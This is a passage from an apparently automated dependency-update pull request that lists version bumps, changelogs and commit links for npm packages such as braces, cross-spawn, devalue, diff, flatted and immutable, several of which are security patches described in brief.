fix unit tests.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/415d660c3002d1ab7e63dbf490c9851da80596ff\"\u003e\u003ccode\u003e415d660\u003c/code\u003e\u003c/a\u003e Snyk js braces 6838727 (\u003ca href=\"https://redirect.github.com/micromatch/braces/issues/40\"\u003e#40\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/190510f79db1adf21d92798b0bb6fccc1f72c9d6\"\u003e\u003ccode\u003e190510f\u003c/code\u003e\u003c/a\u003e fix tests, skip 1 test in test/braces.expand\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/716eb9f12d820b145a831ad678618731927e8856\"\u003e\u003ccode\u003e716eb9f\u003c/code\u003e\u003c/a\u003e readme bump\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/a5851e57f45c3431a94d83fc565754bc10f5bbc3\"\u003e\u003ccode\u003ea5851e5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/braces/issues/37\"\u003e#37\u003c/a\u003e from coderaiser/fix/vulnerability\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/2092bd1fb108d2c59bd62e243b70ad98db961538\"\u003e\u003ccode\u003e2092bd1\u003c/code\u003e\u003c/a\u003e feature: braces: add maxSymbols (\u003ca href=\"https://github.com/micromatch/braces/issues/\"\u003ehttps://github.com/micromatch/braces/issues/\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/9f5b4cf47329351bcb64287223ffb6ecc9a5e6d3\"\u003e\u003ccode\u003e9f5b4cf\u003c/code\u003e\u003c/a\u003e fix: vulnerability (\u003ca href=\"https://security.snyk.io/vuln/SNYK-JS-BRACES-6838727\"\u003ehttps://security.snyk.io/vuln/SNYK-JS-BRACES-6838727\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/98414f9f1fabe021736e26836d8306d5de747e0d\"\u003e\u003ccode\u003e98414f9\u003c/code\u003e\u003c/a\u003e remove funding file\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/braces/commit/665ab5d561c017a38ba7aafd92cc6655b91d8c14\"\u003e\u003ccode\u003e665ab5d\u003c/code\u003e\u003c/a\u003e update keepEscaping doc (\u003ca href=\"https://redirect.github.com/micromatch/braces/issues/27\"\u003e#27\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/micromatch/braces/compare/3.0.2...3.0.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `cross-spawn` from 7.0.3 to 7.0.6\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/moxystudio/node-cross-spawn/blob/master/CHANGELOG.md\"\u003ecross-spawn's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.5...v7.0.6\"\u003e7.0.6\u003c/a\u003e (2024-11-18)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eupdate cross-spawn version to 7.0.5 in package-lock.json (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/f700743918d901eff92960e15a8dd68f87bd4176\"\u003ef700743\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.4...v7.0.5\"\u003e7.0.5\u003c/a\u003e (2024-11-07)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efix escaping bug introduced by backtracking (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/640d391fde65388548601d95abedccc12943374f\"\u003e640d391\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.3...v7.0.4\"\u003e7.0.4\u003c/a\u003e (2024-11-07)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edisable regexp backtracking (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/160\"\u003e#160\u003c/a\u003e) (\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/5ff3a07d9add449021d806e45c4168203aa833ff\"\u003e5ff3a07\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/77cd97f3ca7b62c904a63a698fc4a79bf41977d0\"\u003e\u003ccode\u003e77cd97f\u003c/code\u003e\u003c/a\u003e chore(release): 7.0.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/6717de49ff1e5de49622488dcb9c33fb25370c85\"\u003e\u003ccode\u003e6717de4\u003c/code\u003e\u003c/a\u003e chore: upgrade standard-version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/f700743918d901eff92960e15a8dd68f87bd4176\"\u003e\u003ccode\u003ef700743\u003c/code\u003e\u003c/a\u003e fix: update cross-spawn version to 7.0.5 in package-lock.json\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/9a7e3b2165917367f74b8365faad9873b30d7263\"\u003e\u003ccode\u003e9a7e3b2\u003c/code\u003e\u003c/a\u003e chore: fix build status badge\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/085268352dcbcad8064c64c5efb25268b4023184\"\u003e\u003ccode\u003e0852683\u003c/code\u003e\u003c/a\u003e chore(release): 7.0.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/640d391fde65388548601d95abedccc12943374f\"\u003e\u003ccode\u003e640d391\u003c/code\u003e\u003c/a\u003e fix: fix escaping bug introduced by backtracking\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/bff0c87c8b627c4e6d04ec2449e733048bebb464\"\u003e\u003ccode\u003ebff0c87\u003c/code\u003e\u003c/a\u003e chore: remove codecov\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/a7c6abc6fee79641d45b452fe6217deaa1bd0973\"\u003e\u003ccode\u003ea7c6abc\u003c/code\u003e\u003c/a\u003e chore: replace travis with github workflows\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/9b9246e0969e86656d7ccd527716bc3c18842a19\"\u003e\u003ccode\u003e9b9246e\u003c/code\u003e\u003c/a\u003e chore(release): 7.0.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/moxystudio/node-cross-spawn/commit/5ff3a07d9add449021d806e45c4168203aa833ff\"\u003e\u003ccode\u003e5ff3a07\u003c/code\u003e\u003c/a\u003e fix: disable regexp backtracking (\u003ca href=\"https://redirect.github.com/moxystudio/node-cross-spawn/issues/160\"\u003e#160\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/moxystudio/node-cross-spawn/compare/v7.0.3...v7.0.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `devalue` from 4.3.2 to 5.6.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/devalue/releases\"\u003edevalue's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.6.4\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e87c1f3c: fix: reject \u003ccode\u003e__proto__\u003c/code\u003e keys in malformed \u003ccode\u003eObject\u003c/code\u003e wrapper payloads\u003c/p\u003e\n\u003cp\u003eThis validates the \u003ccode\u003e\u0026quot;Object\u0026quot;\u003c/code\u003e parse path and throws when the wrapped value has an own \u003ccode\u003e__proto__\u003c/code\u003e key.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e40f1db1: fix: ensure sparse array indices are integers\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e87c1f3c: fix: disallow \u003ccode\u003e__proto__\u003c/code\u003e keys in null-prototype object parsing\u003c/p\u003e\n\u003cp\u003eThis disallows \u003ccode\u003e__proto__\u003c/code\u003e keys in the \u003ccode\u003e\u0026quot;null\u0026quot;\u003c/code\u003e parse path so null-prototype object hydration cannot carry that key through parse/unflatten.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.6.3\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e0f04d4d: fix: Properly handle \u003ccode\u003e__proto__\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e819f1ac: fix: better encoding for sparse arrays\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.6.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e1175584: fix: validate input for \u003ccode\u003eArrayBuffer\u003c/code\u003e parsing\u003c/li\u003e\n\u003cli\u003ee46afa6: fix: validate input for typed arrays\u003c/li\u003e\n\u003cli\u003e1175584: fix: more helpful errors for inputs causing stack overflows\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.6.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2161d44: fix: add hasOwn check before calling reviver\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.6.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea3d09d4: feat: expose \u003ccode\u003eDevalueError\u003c/code\u003e for \u003ccode\u003einstanceof\u003c/code\u003e checks in \u003ccode\u003ecatch\u003c/code\u003e clauses\u003c/li\u003e\n\u003cli\u003ea3d09d4: feat: add \u003ccode\u003evalue\u003c/code\u003e and \u003ccode\u003eroot\u003c/code\u003e properties in \u003ccode\u003eDevalueError\u003c/code\u003e instances\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.5.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e828fa1c: Enable support for custom reducer/reviver for \u0026quot;function\u0026quot; values\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.4.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e5c26c0d: fix: allow custom revivers to revive things serialized by builtin reducers\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.4.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/sveltejs/devalue/blob/main/CHANGELOG.md\"\u003edevalue's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.6.4\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e87c1f3c: fix: reject \u003ccode\u003e__proto__\u003c/code\u003e keys in malformed \u003ccode\u003eObject\u003c/code\u003e wrapper payloads\u003c/p\u003e\n\u003cp\u003eThis validates the \u003ccode\u003e\u0026quot;Object\u0026quot;\u003c/code\u003e parse path and throws when the wrapped value has an own \u003ccode\u003e__proto__\u003c/code\u003e key.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e40f1db1: fix: ensure sparse array indices are integers\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e87c1f3c: fix: disallow \u003ccode\u003e__proto__\u003c/code\u003e keys in null-prototype object parsing\u003c/p\u003e\n\u003cp\u003eThis disallows \u003ccode\u003e__proto__\u003c/code\u003e keys in the \u003ccode\u003e\u0026quot;null\u0026quot;\u003c/code\u003e parse path so null-prototype object hydration cannot carry that key through parse/unflatten.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.6.3\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e0f04d4d: fix: Properly handle \u003ccode\u003e__proto__\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e819f1ac: fix: better encoding for sparse arrays\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.6.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e1175584: fix: validate input for \u003ccode\u003eArrayBuffer\u003c/code\u003e parsing\u003c/li\u003e\n\u003cli\u003ee46afa6: fix: validate input for typed arrays\u003c/li\u003e\n\u003cli\u003e1175584: fix: more helpful errors for inputs causing stack overflows\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.6.1\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e2161d44: fix: add hasOwn check before calling reviver\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.6.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ea3d09d4: feat: expose \u003ccode\u003eDevalueError\u003c/code\u003e for \u003ccode\u003einstanceof\u003c/code\u003e checks in \u003ccode\u003ecatch\u003c/code\u003e clauses\u003c/li\u003e\n\u003cli\u003ea3d09d4: feat: add \u003ccode\u003evalue\u003c/code\u003e and \u003ccode\u003eroot\u003c/code\u003e properties in \u003ccode\u003eDevalueError\u003c/code\u003e instances\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.5.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e828fa1c: Enable support for custom reducer/reviver for \u0026quot;function\u0026quot; values\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e5.4.2\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/devalue/commit/6cbb3f51258e01d7769e2b3d77b6ce9ed060804b\"\u003e\u003ccode\u003e6cbb3f5\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://redirect.github.com/sveltejs/devalue/issues/133\"\u003e#133\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/devalue/commit/40f1db13afdd65c8e2ebd02f684276c273ef81b0\"\u003e\u003ccode\u003e40f1db1\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/devalue/commit/87c1f3ce3759765a061cfe34843ecc4b0711ba8d\"\u003e\u003ccode\u003e87c1f3c\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/devalue/commit/a4a37d208a4d1bdd0d58c82e5644c87cab855259\"\u003e\u003ccode\u003ea4a37d2\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://redirect.github.com/sveltejs/devalue/issues/132\"\u003e#132\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/devalue/commit/819f1ac7475ab37547645cfb09bf2f678a799cf0\"\u003e\u003ccode\u003e819f1ac\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/devalue/commit/0f04d4d678eac39ad5d7a07d1956275d7874e81c\"\u003e\u003ccode\u003e0f04d4d\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/devalue/commit/fcf4e88275f2e2e45b9ea70ffaa5247c8f55f057\"\u003e\u003ccode\u003efcf4e88\u003c/code\u003e\u003c/a\u003e fix tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/devalue/commit/1d8a5ea5863bcd9992755ce5a3842265753cb4ab\"\u003e\u003ccode\u003e1d8a5ea\u003c/code\u003e\u003c/a\u003e Version Packages (\u003ca href=\"https://redirect.github.com/sveltejs/devalue/issues/131\"\u003e#131\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/devalue/commit/11755849fa0634ae294a15ec0aef2f43efcad7c4\"\u003e\u003ccode\u003e1175584\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sveltejs/devalue/commit/e46afa64dd2b25aa35fb905ba5d20cea63aabbf7\"\u003e\u003ccode\u003ee46afa6\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/sveltejs/devalue/compare/v4.3.2...v5.6.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by [GitHub Actions](\u003ca href=\"https://www.npmjs.com/~GitHub\"\u003ehttps://www.npmjs.com/~GitHub\u003c/a\u003e Actions), a new releaser for devalue since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `diff` from 5.2.0 to 5.2.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/kpdecker/jsdiff/blob/master/release-notes.md\"\u003ediff's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.2 - January 2026\u003c/h2\u003e\n\u003cp\u003eOnly change from 5.2.0 is a backport of the fix to \u003ca href=\"https://github.com/kpdecker/jsdiff/security/advisories/GHSA-73rr-hh4g-fpgx\"\u003ehttps://github.com/kpdecker/jsdiff/security/advisories/GHSA-73rr-hh4g-fpgx\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003ev5.2.1 (deprecated)\u003c/h2\u003e\n\u003cp\u003eAccidental release - do not use.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/b7b6339dea15baa636bebe7092ec1cbabf001dea\"\u003e\u003ccode\u003eb7b6339\u003c/code\u003e\u003c/a\u003e v5.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/b5377abefc55cd424e82308515cfbdc4d53ad8a1\"\u003e\u003ccode\u003eb5377ab\u003c/code\u003e\u003c/a\u003e Update package version to 5.2.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/78017899c4c80d51db805b6e013079cadc6ed0ae\"\u003e\u003ccode\u003e7801789\u003c/code\u003e\u003c/a\u003e Backport \u003ca href=\"https://redirect.github.com/kpdecker/jsdiff/pull/649\"\u003ekpdecker/jsdiff#649\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kpdecker/jsdiff/commit/042a8372f331ffd3d81b1e4b799409c7d944e6fd\"\u003e\u003ccode\u003e042a837\u003c/code\u003e\u003c/a\u003e Backport \u003ca href=\"https://redirect.github.com/kpdecker/jsdiff/pull/647\"\u003ekpdecker/jsdiff#647\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/kpdecker/jsdiff/compare/v5.2.0...v5.2.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flatted` from 3.3.1 to 3.4.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/3bf09091c3562e17a0647bc06710dd6097079cf7\"\u003e\u003ccode\u003e3bf0909\u003c/code\u003e\u003c/a\u003e 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802\"\u003e\u003ccode\u003e885ddcc\u003c/code\u003e\u003c/a\u003e fix CWE-1321\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/0bdba705d130f00892b1b8fcc80cf4cdea0631e3\"\u003e\u003ccode\u003e0bdba70\u003c/code\u003e\u003c/a\u003e added flatted-view to the benchmark\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/2a02dce7c641dec31194c67663f9b0b12e62da20\"\u003e\u003ccode\u003e2a02dce\u003c/code\u003e\u003c/a\u003e 3.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/fba4e8f2e113665da275b19cd0f695f3d98e9416\"\u003e\u003ccode\u003efba4e8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/WebReflection/flatted/issues/89\"\u003e#89\u003c/a\u003e from WebReflection/python-fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/5fe86485e6df7f7f34a07a2a85498bd3e17384e7\"\u003e\u003ccode\u003e5fe8648\u003c/code\u003e\u003c/a\u003e added \u0026quot;when in Rome\u0026quot; also a test for PHP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/53517adbefe724fe472b2f9ebcdb01910d0ae3f0\"\u003e\u003ccode\u003e53517ad\u003c/code\u003e\u003c/a\u003e some minor improvement\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/b3e2a0c387bf446435fec45ad7f05299f012346f\"\u003e\u003ccode\u003eb3e2a0c\u003c/code\u003e\u003c/a\u003e Fixing recursion issue in Python too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/c4b46dbcbf782326e54ea1b65d3ebb1dc7a23fad\"\u003e\u003ccode\u003ec4b46db\u003c/code\u003e\u003c/a\u003e Add SECURITY.md for security policy and reporting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/f86d071e0f70de5a7d8200198824a3f07fc9c988\"\u003e\u003ccode\u003ef86d071\u003c/code\u003e\u003c/a\u003e Create dependabot.yml for version updates\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/WebReflection/flatted/compare/v3.3.1...v3.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `immutable` from 4.3.5 to 4.3.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/immutable-js/immutable-js/releases\"\u003eimmutable's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.3.8\u003c/h2\u003e\n\u003cp\u003eFix Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') in immutable\u003c/p\u003e\n\u003ch2\u003ev4.3.7\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix issue with slice negative of filtered sequence by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/2006\"\u003eimmutable-js/immutable-js#2006\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/immutable-js/immutable-js/compare/v4.3.6...v4.3.7\"\u003ehttps://github.com/immutable-js/immutable-js/compare/v4.3.6...v4.3.7\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev4.3.6\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix Repeat(\u003c!-- raw HTML omitted --\u003e).equals(undefined) incorrectly returning true by \u003ca href=\"https://github.com/butchler\"\u003e\u003ccode\u003e@​butchler\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1994\"\u003eimmutable-js/immutable-js#1994\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eInternals\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003echange youtube image by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1973\"\u003eimmutable-js/immutable-js#1973\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpgrade eslint and ignore no-constructor-return rule for actual constructors by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1974\"\u003eimmutable-js/immutable-js#1974\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eupgrate documentation website to next 14 by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1975\"\u003eimmutable-js/immutable-js#1975\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003estart migrating to nextjs app router by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1976\"\u003eimmutable-js/immutable-js#1976\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eupgrade next sitemap by \u003ca href=\"https://github.com/jdeniau\"\u003e\u003ccode\u003e@​jdeniau\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1978\"\u003eimmutable-js/immutable-js#1978\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/butchler\"\u003e\u003ccode\u003e@​butchler\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/immutable-js/immutable-js/pull/1994\"\u003eimmutable-js/immutable-js#1994\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/immutable-js/immutable-js/compare/v4.3.5...v4.3.6\"\u003ehttps://github.com/immutable-js/immutable-js/compare/v4.3.5...v4.3.6\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/immutable-js/immutable-js/blob/main/CHANGELOG.md\"\u003eimmutable's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChangelog\u003c/h1\u003e\n\u003cp\u003eAll notable changes to this project will be documented in this file.\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"https://keepachangelog.com/en/1.0.0/\"\u003eKeep a 